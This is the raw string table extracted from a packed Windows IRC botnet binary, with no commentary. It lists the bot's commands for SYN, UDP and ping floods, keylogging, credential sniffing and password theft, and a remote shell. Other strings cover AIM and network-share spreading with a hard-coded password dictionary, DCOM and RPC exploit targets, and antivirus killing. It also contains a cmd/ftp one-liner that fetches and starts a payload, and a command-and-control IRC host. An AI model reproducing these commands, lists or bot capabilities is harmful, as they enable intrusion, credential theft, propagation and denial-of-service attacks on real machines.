htqA
h`qA
SVW3
h@pA
WPWW
SVWjS
h@pA
VPVV
SVWjS
=<PA
SUV3
WUhXrA
tKUh#N
UhPrA
UhHrA
_^][
t+Uh
Uh|rA
UhlrA
_^][
YYSSj
WShPrA
Sj%h
Sj%h
Sj'h
Sj'h
Sj%h
Sj%h
_^][
QQSV
t	WS
Y_^3
QSVW
VPVh?
SVW3
8-u?
9]0u&
Yt"Ph
Yu<j
YuK9E0
YuBPj
PhP~A
hd}A
hD}A
SPhM[@
6h||A
6hp|A
6hl|A
6hd|A
6h`|A
6hT|A
6hP|A
6hL|A
6h@|A
6h8|A
6h4|A
6h,|A
PPQh
hp{A
h,{A
SPhaz@
PhhzA
E4YY
h,zA
j<Y;
8#t,P
PhLyA
E6PS
h@yA
0h0yA
0h yA
Sj	V
SPh_
Ph\xA
Ph0xA
QPPj(j
PPSP
PhTwA
Yt4Ph
3htvA
hlvA
hLvA
h vA
(Vh4
h`uA
3h\uA
Ph8uA
h|tA
PhDtA
h,tA
h(tA
Ph\sA
Ph,sA
SVW3
t%SW
u(CSV
WPPV
WWWV
j<hT
<j0h
SPWVjHh
SPWV
YSjHh
X_^[
t=;}
_WVP
PVVj(VV
A;L$
SVWj2
t4Ht+HHt!Ht
u$SS
YPhX
YPh 
aVWSS
Y_^[]
^VWP
PWj(j
5HPA
_^[U
VHWt,Ht
SjHh
u}Sj
j<QP
j<QP
j<QP
j<QP
-PPA
t1SSSSh
t(h`
tRh0
X_^][
UVW3
tdSWh
YYVj
5xPA
_WVP
PVVh
SVWhD
SQSV
=|QA
ABB;
Y@YP
GFF;u
Y@Y@P
Y@YP
SVW3
SVWtP
tw9]
tWSS
X_^[
BBIu
SVWji
SVWji
SVWjI3
YYSj
5HPA
VWj&Y
Yu V
YYu V
_^V3
VVVVV
u	V3
t)9u
@V@P
WVh,
Yu	9E(
9Qh 
X_^[
VPVV
VSPW
[u V
5HPA
Yt'h
tT@;E
VVhh
_WVP
PVVVSV
=HPA
YYVj
QVPh9
ARWh,
jAYj
jaY;
ARWh,
ARWh,
ARWh,
PVhd
t4W3
_WVP
PVj(SV
=HPA
VWj&Y
YY9u
YY9u
uD!E
uD!E
Xjt+
EVWS
WSWS
YYPV
^_[]
SVWj
h\sA
_^[U
SVWj,
YtLh
WWWPW
t_WP
5@PA
-DPA
PWSh
PWSh
PWVh
_WSSh
SUVW
_^][
jdWS
Xw[r
jFPh
jFPh
P_^[
VWj&Y
u-VW
SVW3
QSV3
1;t$
9E$t	
<*t4<?t
FBB;t$
SVWt
Yt%j
SVWj
YPh$
X_^[
X_^[
X_^[
X_^[
GIt#
5`)D
tD+E
5`)D
<Xt	
u,9E
^_[3
tzVS
GIt%
t/Ku
SUVW
_^][
^[_3
t&:a
QSVW
t7)E
wDVSU
5`)D
5`)D
_^][
1AABBf
WVS3
uRFGHt
SVWu
^}%95T
QSVW
QQSVWd
4SVW
X_^[]
SVWUj
]_^[
t.;t$$t(
;5t)D
^h$pA
YYh0pA
h(pA
@BB;
5hPA
H_^[]
XSVW
_WPS
HHtpHHtl
 Yt	f
RPWV
t	9E
YYj0[
?]u	
<]t_G<-uA
]t6G:
YY9u
>%uM
5`)D
5`)D
%T)D
%X)D
j?I_
u	9}
=@QA
ulSj
5`)D
5L)D
uY;]
pD#U
j #M
j?^;
%T)D
5\)D
5`)D
5`)D
5`)D
X_^[
Y;5$'D
90tr
0B=H
5$'D
%TQA
%PQA
Wj@Y3
5$'D
t7SW
    
5D)D
5$'D
5$'D
5D)D
5$'D
5D)D
@AA;
=l)D
=<'D
SUVW
_^][
~&WP
SVW3
95 'D
F;5 'D
X_[^
QQSV
btHHt.
SUV3
_^][
hxVA
eYt,F
SVt'
80t<
VWt*
Sj0W
8-PS
_^[]
uFWWj
"WWSh\
9} u
E WW
tMWWS
t@9}
VSh 
8csm
u,9x
X_^]
uV9~
YY_^[
VWt!
sO;>|C;~
u Vj
8csm
u SW
_^[]
?csm
8csm
YYPW
QQSVW
QQSVW
h0WA
QQSVW
Yu!j
5 'D
VWss
=l)D
5d)D
<"u%
F<"t
t9UW
?=t"U
QQS3
PSSW
8"uD
8"uF@
8"u,
-0PA
@@f9
@@f9
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
DSUVWh
_^][
VC20XC00U
SVWU
tEVU
t3x<
]_^[
h ZA
8csm
Yt	V
~*9E
PVj	
h8ZA
PVh\
t-Ht!Ht
5t.;
SVWj 
t!CS
SVWj 
1_^[
PPPP
PPPP
@PWV
_^[]
SVWf
u+Vj
5`)D
^95 'D
F;5 'D
VWuBh
hhZA
tPhXZA
hDZA
@}>j
\SVW
+ttHHtd
	j	XO
h|ZA
htZA
HHtYHHtF
[_^]
tAVW
%$QA
 n;^
Qkkbal
i]Wb
9a&g
MGiI
wn>Jj
#.zf
+o*7
 (8PX
700WP
`h````
ppxxxx
(null)
GAIsProcessorFeaturePresent
KERNEL32
e+000
runtime error 
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
1#QNAN
1#INF
1#IND
1#SNAN
FindWindowExA
SendMessageA
IsWindow
FindWindowA
GetMenu
IsCharAlphaNumericA
wsprintfA
USER32.dll
OLEAUT32.dll
ExitThread
Sleep
GetTickCount
CreateThread
CloseHandle
GetModuleFileNameA
GetModuleHandleA
ExitProcess
DeleteFileA
GetTempPathA
CreateProcessA
GetLastError
MultiByteToWideChar
ReadFile
WriteFile
TransactNamedPipe
CreateFileA
GetSystemDirectoryA
GetLocalTime
LoadLibraryA
GetProcAddress
FormatMessageA
UnmapViewOfFile
MapViewOfFile
CreateFileMappingA
SetFileTime
GetFileTime
ExpandEnvironmentStringsA
SetFileAttributesA
GetFileAttributesA
lstrcpynA
lstrcmpA
lstrcpyA
lstrlenA
CopyFileA
WideCharToMultiByte
TerminateProcess
lstrcmpiA
OpenProcess
GetCurrentProcess
GetExitCodeProcess
PeekNamedPipe
DuplicateHandle
CreatePipe
GetComputerNameA
GetLocaleInfoA
GetVersionExA
GetCurrentProcessId
WaitForSingleObject
CreateMutexA
TerminateThread
QueryPerformanceCounter
QueryPerformanceFrequency
GlobalMemoryStatus
GetTimeFormatA
GetDateFormatA
LocalFree
HeapFree
HeapAlloc
HeapReAlloc
RtlUnwind
GetStartupInfoA
GetCommandLineA
GetVersion
RaiseException
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
GetCPInfo
GetACP
GetOEMCP
LCMapStringA
LCMapStringW
SetFilePointer
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
SetUnhandledExceptionFilter
GetStringTypeA
GetStringTypeW
SetStdHandle
FlushFileBuffers
IsBadReadPtr
IsBadCodePtr
SetEndOfFile
KERNEL32.dll
nt139
nt445
nt1025
wks1
wks2
wks3
dcom135
dcom445
dcom1025
 Total: %d in %s.
 %s: %d,
[SCAN]: Exploit Statistics:
[SCAN]: Scan not active.
[SCAN]: Current IP: %s.
%d.%d.%d.%d
[SCAN]: Finished at %s:%d after %d minute(s) of scanning.
[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.
_AimAd
#32770
_Oscar_StatusNotify
_Oscar_IconBtn
Ate32Class
CBClass
WndAte32Class
AIM_IMessage
_Oscar_Tree
%s%s
[MAIN]: %s
[SECURE]: Failed to start secure thread, error: <%d>.
[SECURE]: %s system.
Unsecuring
Securing
[SOCKS4]: Server started on: %s:%d.
[PROC]
Process list
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Bot ID: %s.
[THREADS]: Failed to start list thread, error: <%d>.
[THREADS]: List threads.
[MAIN]: Removing Bot.
[PROCS]: Failed to start listing thread, error: <%d>.
[PROCS]: Proccess list.
full
[PROC]: Already running.
[MAIN]: Uptime: %s.
[THREADS]: Failed to kill thread: %s.
[THREADS]: Killed thread: %s.
[THREADS]: No active threads found.
[THREADS]: Stopped: %d thread(s).
[CLONES]: Failed to kill thread: %s.
[CLONES]: Killed thread: %s.
[CLONES]: Random nick change of clone: %d to: %s.
[PROC]: Failed to terminate process: %s
[PROC]: Process killed: %s
[PROC]: Failed to terminate process ID: %s
[PROC]: Process killed ID: %s
[FILE]:
[FILE]: Deleted '%s'.
[mIRC]: Command sent.
[mIRC]: Client not open.
[CMD]: Error sending to remote shell.
MODE %s
NICK %s
JOIN %s %s
PART %s
[UPDATE]: Bot ID must be different than current running process.
[UPDATE]: Failed to start download thread, error: <%d>.
[UPDATE]: Downloading update from: %s.
%s%s.exe
[EXEC]: Commands: %s
[EXEC]: Couldn't execute file.
[CLONES]: Failed to start clone thread, error: <%d>.
[CLONES]: Created on %s:%d, in channel %s.
[SYN]: Failed to start flood thread, error: <%d>.
[SYN]: Flooding: (%s:%d) for %s seconds.
[DOWNLOAD]: Failed to start transfer thread, error: <%d>.
[DOWNLOAD]: Downloading URL: %s to: %s.
[%s] <%s> %s
[%s] * %s %s
ACTION %s
[SCAN]: Failed to start scan thread, error: <%d>.
[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
Sequential
Random
[SCAN]: Failed to start scan, no IP specified.
[SCAN]: Already %d scanning threads. Too many specified.
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[FTP]: Uploading file: %s to: %s failed.
[FTP]: Uploading file: %s to: %s
open
ftp.exe
-s:%s
open %s
put %s
%s\%i%i%i.dll
[FTP]: File not found: %s.
upload
ping
pingflood
udpflood
advscan
c_action
c_pm
c_privmsg
download
synflood
clone
execute
update
c_part
c_join
c_nick
c_mode
c_raw
[KEYLOG]: Failed to start logging thread, error: <%d>.
[KEYLOG]: Key logger active.
[KEYLOG]: Already running.
[KEYLOG]: No key logger thread found.
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
file
keylog
[PSNIFF]: No Carnivore thread found.
[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)
[PSNIFF]: Failed to start sniffer thread, error: <%d>.
[PSNIFF]: Carnivore packet sniffer active.
[PSNIFF]: Already running.
psniff
mirc
mirccmd
delete
kill
killproc
c_rn
c_rndnick
c_quit
killthread
password
[AIM]: Failed to start spreading thread, error: <%d>.
[AIM] AIM spread thread active.
[AIM]: No AIM spread thread found.
[AIM]: AIM spread stopped. (%d thread(s) stopped.)
aimspread
[MAIN]: Sent IRC Raw: %s.
currentip
[FLUSHDNS]: Failed to load dnsapi.dll.
[FLUSHDNS]: Failed to flush DNS cache.
[FLUSHDNS]: DNS cache flushed.
flushdns
[CMD]
Remote shell
closecmd
[CMD]: Remote shell ready.
[CMD]: Couldn't open remote shell.
[CMD]: Remote shell already running.
opencmd
uptime
procs
remove
sysinfo
netinfo
threads
status
QUIT :later
QUIT :%s
quit
QUIT :disconnecting
disconnect
QUIT :reconnecting
reconnect
stats
[SCAN]
Scan
scanstop
[SECURE]
Secure
securestop
[CLONES]
Clone
clonestop
psstop
procsstop
[TFTPD]
tftpstop
[PING]
Ping flood
pingstop
[SYN]
Syn flood
synstop
[SOCKS4]
Server
socks4stop
socks4
unsec
unsecure
secure
version
TOPIC
NICK %s
USER %s 0 0 :%s
PASS %s
MARB
MEOW
MEOW(
MEOW
[%s]: Exploiting IP: %s.
[TFTPD]: File transfer started to IP: %s
\\%s\pipe\epmapper
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[DOWNLOAD]: Update failed: Error executing file: %s.
[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Now updating.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: Couldn't open file: %s.
Unknown
Invalid
Disk
Network
Cdrom
failed
%sKB
[MAIN]: %s Drive (%s): %s total, %s free, %s available.
[MAIN]: %s Drive (%s): Failed to stat, device not ready.
%s %s :%s
PRIVMSG
NOTICE
[ESC]
[ESC]
[F1]
[F1]
[F2]
[F2]
[F3]
[F3]
[F4]
[F4]
[F5]
[F5]
[F6]
[F6]
[F7]
[F7]
[F8]
[F8]
[F9]
[F9]
[F10]
[F10]
[F11]
[F11]
[F12]
[F12]
[TAB]
[TAB]
[CTRL]
[CTRL]
[WIN]
[WIN]
[WIN]
[WIN]
[PRSC]
[PRSC]
[SCLK]
[SCLK]
[INS]
[INS]
[HOME]
[HOME]
[PGUP]
[PGUP]
[DEL]
[DEL]
[END]
[END]
[PGDN]
[PGDN]
[LEFT]
[LEFT]
[UP]
[UP]
[RGHT]
[RGHT]
[DOWN]
[DOWN]
[NMLK]
[NMLK]
[KEYLOG]: %s
[%d-%d-%d %d:%d:%d] %s
%s (Return) (%s)
%s (Buffer full) (%s)
%s (Changed Windows: %s)
PStoreCreateInstance
pstorec.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
SHChangeNotify
ShellExecuteA
shell32.dll
WNetCancelConnection2W
WNetCancelConnection2A
WNetAddConnection2W
WNetAddConnection2A
mpr.dll
DeleteIpNetEntry
GetIpNetTable
iphlpapi.dll
DnsFlushResolverCacheEntry_A
DnsFlushResolverCache
dnsapi.dll
NetMessageBufferSend
NetUserGetInfo
NetUserEnum
NetUserDel
NetUserAdd
NetRemoteTOD
NetApiBufferFree
NetScheduleJobAdd
NetShareEnum
NetShareDel
NetShareAdd
netapi32.dll
IcmpSendEcho
IcmpCloseHandle
IcmpCreateFile
icmp.dll
Mozilla/4.0 (compatible)
InternetCloseHandle
InternetReadFile
InternetCrackUrlA
InternetOpenUrlA
InternetOpenA
InternetConnectA
HttpSendRequestA
HttpOpenRequestA
InternetGetConnectedStateEx
InternetGetConnectedState
wininet.dll
closesocket
shutdown
getpeername
gethostbyaddr
gethostbyname
gethostname
getsockname
setsockopt
accept
listen
select
bind
recvfrom
recv
sendto
send
ntohl
ntohs
htonl
htons
inet_addr
inet_ntoa
connect
ioctlsocket
socket
WSACleanup
WSAGetLastError
WSAIoctl
__WSAFDIsSet
WSAAsyncSelect
WSASocketA
WSAStartup
ws2_32.dll
DeleteObject
DeleteDC
BitBlt
SelectObject
GetDIBColorTable
GetDeviceCaps
CreateCompatibleDC
CreateDIBSection
CreateDCA
gdi32.dll
StartServiceCtrlDispatcherA
SetServiceStatus
RegisterServiceCtrlHandlerA
GetUserNameA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegDeleteValueA
RegQueryValueExA
RegSetValueExA
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
GetForegroundWindow
GetWindowTextA
GetKeyState
GetAsyncKeyState
ExitWindowsEx
CloseClipboard
GetClipboardData
OpenClipboard
DestroyWindow
IsWindow
FindWindowA
GetMenu
FindWindowExA
SendMessageA
user32.dll
RegisterServiceProcess
QueryPerformanceFrequency
QueryPerformanceCounter
SearchPathA
GetDriveTypeA
GetLogicalDriveStringsA
GetDiskFreeSpaceExA
Module32First
Process32Next
Process32First
CreateToolhelp32Snapshot
SetErrorMode
kernel32.dll
%s Error: %s <%d>.
mIRC
explorer.exe
%%comspec%% /c %s %s
@echo off
:repeat
del "%%1"
if exist "%%1" goto repeat
del "%s"
%sdel.bat
[PASS] AutoComplete: %s %s:%s
https:/
http:/
:String
StringIndex
e161255a
[PASS] MSN Explorer: %s:%s
b9819c52
[PASS] Protected: %s %s:%s
5e7e8100
k[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)
(no password)
%s\%s\%s
c$\shared
IPC$
print$
C$\Documents and Settings\All Users\My Pictures\$
C$\Documents and Settings\All Users\My Documents\$
c$\windows\system32
c$\winnt\system32
admin$
Admin$\system32
%s\ipc$
\\%s
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
kpf4gui.exe
i11r54n4.exe
irun4.exe
d3dupdate.exe
rate.exe
ssate.exe
winsys.exe
winupd.exe
SysMonXP.exe
bbeagle.exe
Penis32.exe
teekids.exe
MSBLAST.exe
mscvb32.exe
sysinfo.exe
PandaAVEngine.exe
wincfg32.exetaskmon.exe
zonealarm.exe
navapw32.exe
navw32.exe
zapro.exe
msblast.exe
netstat.exe
msconfig.exe
regedit.exe
 %s (%d)
SeDebugPrivilege
[PROC]: Process list failed.
[PROC]: Process list completed.
[PROC]: Listing processes:
NOTICE %s :
PING %s
PING
MODE %s %s
JOIN %s %s-high
MODE %s +i
USERHOST %s
NICK %s
NICK
JOIN %s %s
KICK
PONG %s
PING
:.login
:,login
:!login
:@login
:$login
:%login
:^login
:&login
:*login
:-login
:+login
:/login
:\login
:=login
:?login
:'login
:`login
:~login
:.auth
:,auth
:!auth
:@auth
:$auth
:%auth
:^auth
:&auth
:*auth
:-auth
:+auth
:/auth
:\auth
:=auth
:?auth
:'auth
:`auth
:~auth
:.id
:,id
:!id
:@id
:$id
:%id
:^id
:&id
:*id
:-id
:+id
:/id
:\id
:=id
:?id
:'id
:`id
:~id
:.hashin
:!hashin
:$hashin
:%hashin
:.secure
:!secure
:.syn
:!syn
:$syn
:%syn
 CDKey 
JOIN #
NICK 
OPER 
now an IRC Operator
USER 
PASS 
paypal
PAYPAL
paypal.com
PAYPAL.COM
Set-Cookie:
HTTP
[PSNIFF]: Error: recv() failed, returned: <%d>
[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s
[PSNIFF]
[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.
[PSNIFF]: Error: bind() failed, returned: <%d>.
[PSNIFF]: Error: socket() failed, returned: <%d>.
PRIVMSG %s :%s
[CMD]: Could not read data from proccess.
[CMD]: Proccess has terminated.
[CMD]: Could not read data from proccess
[CMD]: Failed to start IO thread, error: <%d>.
[CMD]: Remote Command Prompt
cmd.exe
const
letter
comp
country
%s%c
[%s]|
[%d]%s
lgMod
system32.exe
klmn
System Support
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
Software\Microsoft\OLE
SYSTEM\CurrentControlSet\Control\Lsa
intranet
main
winpass
blank
office
control
nokia
siemens
compaq
dell
cisco
orainstall
sqlpassoainstall
db1234
databasepassword
data
databasepass
dbpassword
dbpass
access
domainpassword
domainpass
domain
hello
hell
slut
bitch
fuck
exchange
backup
technical
loginpass
login
mary
katie
kate
george
eric
chris
neil
brian
susan
luke
peter
john
mike
bill
fred
win2000
winnt
winxp
win2k
win98
windows
oeminstall
oemuser
user
homeuser
home
accounting
accounts
internet
outlook
mail
qwerty
null
server
system
changeme
linux
unix
demo
none
test
2004
2003
2002
2001
2000
1234567890
123456789
12345678
1234567
123456
12345
1234
pass
pass1234
passwd
password1
oracle
database
default
guest
wwwadmin
teacher
student
owner
computer
root
staff
admin
admins
administrat
administrateur
administrador
administrator
irc.legi0n.org
2442
%s %d "%s"
%s\%s
[SECURE]: Advapi32.dll couldn't be loaded.
[SECURE]: Failed to open enumeration of SAM accounts registry key.
[SECURE]: Restricted anonymous enumeration of SAM accounts.
[SECURE]: Failed to restrict anonymous enumeration of SAM accounts.
restrictanonymoussam
[SECURE]: Failed to open IPC$ Restriction registry key.
[SECURE]: Restricted access to the IPC$ Share.
[SECURE]: Failed to restrict access to the IPC$ Share.
restrictanonymous
[SECURE]: Failed to open DCOM registry key.
[SECURE]: DCOM disabled.
[SECURE]: Disable DCOM failed.
EnableDCOM
[SECURE]: Unrestricted anonymous enumeration of SAM accounts.
[SECURE]: Failed to unrestrict anonymous enumeration of SAM accounts.
[SECURE]: Failed to open IPC$ restriction registry key.
[SECURE]: Unrestricted access to the IPC$ Share.
[SECURE]: Failed to unrestrict access to the IPC$ Share.
[SECURE]: DCOM enabled.
[SECURE]: Enable DCOM failed.
essAu
tThru
tftp.exe -i  get 
X[]P
WRQQj(j
QQUS
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Failed to start client thread, error: <%d>.
[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SECURE]: Registry monitor active.
[SECURE]: System secure monitor active.
[PROCS]: AV/FW Killer active.
[MAIN]: Bot started.
[SYN]: Done with flood (%iKB/sec).
[SYN]: Send error: <%d>.
%dd %dh %dm
[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s.
HH:mm:ss
dd:MMM:yyyy
couldn't resolve host
%s (%s)
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
Dial-up
Not connected
%d. %s
-[Thread List]-
%s: No %s thread found.
%s: %s stopped. (%d thread(s) stopped.)
0@P1
h<_1
Windows 2000 SP4 GER FAT32
Windows XP SP0+1 ENG
Windows XP SP0+1 GER+NL+IT+FR
\\%s\pipe\wkssvc
\\%s\ipc$
cmd /c echo open %s %d > o & echo user %s  >> o & echo get %s >> o & echo quit >> o &ftp -n -s:o &%s&start %s&exit
.?AV_com_error@@
.?AVtype_info@@
kU'9
HMXB
?Zd;
?/L[
S;uD
z?aUY
D?$?
U>c{
zc%C1
.:3q
-64OS
NKeb
?w)z
[MAIN]: Bot started.
[XP]|SYYYKnkG
[PROCS]: AV/FW Killer active.
[SECURE]: System secure monitor active.
[SECURE]: Registry monitor active.
irc.legi0n.org
[SECURE]: Registry monitor active.
ive.
C:\WINDOWS\System32\system32.exe
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
                        
        
USER32.DLL
ExitWindowsEx
SQRVWU
]_^ZY[
]_^ZY[
]_^ZY[
SQRVW
_^ZY[
_^ZY[
SQRVW
,$Ej@
_^ZY[
_^ZY[
,$%k@
GetModuleHandleA
Sleep
LoadLibraryA
VirtualProtect
CreateThread
ExitThread
ExitProcess
CreateFileA
GetModuleFileNameA
OpenProcess
DeleteFileA
CloseHandle
ReadFile
lstrcmpi
GlobalAlloc
GlobalFree
CopyFileA
GetFileSize
WriteFile
GetTickCount
OpenFile
SetFilePointer
KERNEL32
GetProcAddress
PolyCrypt PE (c) 2004-2005, JLabSoftware.